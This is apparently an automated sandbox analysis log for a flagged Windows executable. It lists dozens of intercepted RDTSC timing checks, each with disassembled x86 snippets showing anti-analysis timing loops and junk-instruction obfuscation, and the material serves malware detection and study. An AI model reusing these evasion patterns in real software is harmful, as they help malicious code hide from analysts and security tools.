Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE1EF2 second address: FE1F2A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F449CC63D92h 0x00000008 jmp 00007F449CC63D86h 0x0000000d jnl 00007F449CC63D76h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 jmp 00007F449CC63D7Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 101495B second address: 1014964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1014964 second address: 1014979 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F449CC63D76h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d js 00007F449CC63D76h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 101558B second address: 101558F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1020758 second address: 102075E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102075E second address: 1020765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10212EE second address: 102130B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D89h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102130B second address: 102130F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1021FD8 second address: 1021FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1022094 second address: 1022098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1022098 second address: 102209E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10222E7 second address: 10222EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10222EC second address: 10222F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102238B second address: 1022390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1022390 second address: 10223A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F449CC63D76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102245F second address: 1022464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10228A7 second address: 1022936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F449CC63D7Bh 0x0000000f nop 0x00000010 mov esi, dword ptr [ebp+122D3D40h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F449CC63D78h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 jmp 00007F449CC63D7Ch 0x00000037 mov esi, dword ptr [ebp+122D3D94h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edi 0x00000042 call 00007F449CC63D78h 0x00000047 pop edi 0x00000048 mov dword ptr [esp+04h], edi 0x0000004c add dword ptr [esp+04h], 00000015h 0x00000054 inc edi 0x00000055 push edi 0x00000056 ret 0x00000057 pop edi 0x00000058 ret 0x00000059 xchg eax, ebx 0x0000005a push edx 0x0000005b pushad 0x0000005c jmp 00007F449CC63D87h 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1023351 second address: 1023356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1023BE3 second address: 1023BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1023BE9 second address: 1023BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1024EE9 second address: 1024EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102DEE3 second address: 102DF6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0740h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F449CEB0738h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 pushad 0x00000026 mov dword ptr [ebp+122D3A40h], esi 0x0000002c mov dword ptr [ebp+1246D87Fh], edi 0x00000032 popad 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007F449CEB0738h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f push 00000000h 0x00000051 mov bx, ax 0x00000054 xchg eax, esi 0x00000055 jng 00007F449CEB074Ah 0x0000005b push edx 0x0000005c jmp 00007F449CEB0742h 0x00000061 pop edx 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 pushad 0x00000067 popad 0x00000068 push edx 0x00000069 pop edx 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102C1A7 second address: 102C220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov edi, 07DDC089h 0x00000010 stc 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov edi, dword ptr [ebp+122D1DB8h] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov edi, dword ptr [ebp+122D3C60h] 0x0000002b mov eax, dword ptr [ebp+122D102Dh] 0x00000031 jmp 00007F449CC63D88h 0x00000036 push FFFFFFFFh 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F449CC63D78h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 nop 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pop edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102C220 second address: 102C22D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10300E8 second address: 10300ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102F2C8 second address: 102F2D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1031274 second address: 10312A5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D3BB4h] 0x00000013 push 00000000h 0x00000015 mov ebx, dword ptr [ebp+122D3CB4h] 0x0000001b mov dword ptr [ebp+122D1D1Fh], edx 0x00000021 push 00000000h 0x00000023 add dword ptr [ebp+122D2A69h], eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10312A5 second address: 10312AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10312AA second address: 10312C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D82h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1030375 second address: 1030385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103336A second address: 1033370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103246F second address: 1032473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1033370 second address: 103337A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103337A second address: 1033386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1034278 second address: 103427E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10335B2 second address: 10335C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F449CEB0736h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10335C5 second address: 10335CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103838E second address: 10383CF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D367Eh], ebx 0x0000000f push 00000000h 0x00000011 mov ebx, 16405702h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F449CEB0738h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 jg 00007F449CEB0736h 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1035562 second address: 1035568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103741C second address: 1037420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103856B second address: 103859B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F449CC63D7Eh 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1038687 second address: 103868B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103868B second address: 10386B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F449CC63D89h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10386B1 second address: 10386B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103A6D9 second address: 103A6DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103B3D6 second address: 103B3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103A6DD second address: 103A6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103B3DD second address: 103B3F4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jo 00007F449CEB0736h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F449CEB0740h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103B3F4 second address: 103B45D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F449CC63D78h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007F449CC63D78h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000019h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f sub bx, E340h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F449CC63D87h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103B5EB second address: 103B5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 103B5F0 second address: 103B6AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007F449CC63D90h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F449CC63D78h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jo 00007F449CC63D7Ch 0x00000031 mov dword ptr [ebp+122D1E1Bh], ebx 0x00000037 push dword ptr fs:[00000000h] 0x0000003e mov dword ptr [ebp+124492C4h], edx 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b push 00000000h 0x0000004d push ebx 0x0000004e call 00007F449CC63D78h 0x00000053 pop ebx 0x00000054 mov dword ptr [esp+04h], ebx 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc ebx 0x00000061 push ebx 0x00000062 ret 0x00000063 pop ebx 0x00000064 ret 0x00000065 mov eax, dword ptr [ebp+122D13A1h] 0x0000006b mov bx, ax 0x0000006e push FFFFFFFFh 0x00000070 movsx ebx, dx 0x00000073 mov dword ptr [ebp+122D1E36h], edx 0x00000079 nop 0x0000007a pushad 0x0000007b pushad 0x0000007c jnp 00007F449CC63D76h 0x00000082 jbe 00007F449CC63D76h 0x00000088 popad 0x00000089 push eax 0x0000008a push edx 0x0000008b jng 00007F449CC63D76h 0x00000091 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10428FE second address: 1042911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F449CEB0736h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F449CEB0736h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10231A6 second address: 10231AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FDE914 second address: FDE923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FDE923 second address: FDE92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FDE92D second address: FDE931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FDE931 second address: FDE943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jnp 00007F449CC63D76h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A400 second address: 104A454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 jp 00007F449CEB0743h 0x0000000d jmp 00007F449CEB073Dh 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jl 00007F449CEB0742h 0x0000001c jmp 00007F449CEB073Ch 0x00000021 mov eax, dword ptr [eax] 0x00000023 jmp 00007F449CEB0744h 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e je 00007F449CEB0738h 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A50F second address: 104A533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CC63D81h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A533 second address: 104A539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A539 second address: 104A53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A53D second address: 104A553 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A553 second address: 104A557 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A557 second address: 104A55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A55D second address: 104A563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A563 second address: 104A572 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104A572 second address: 104A576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104F68E second address: 104F692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104F692 second address: 104F6B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F449CC63D76h 0x00000008 jmp 00007F449CC63D89h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
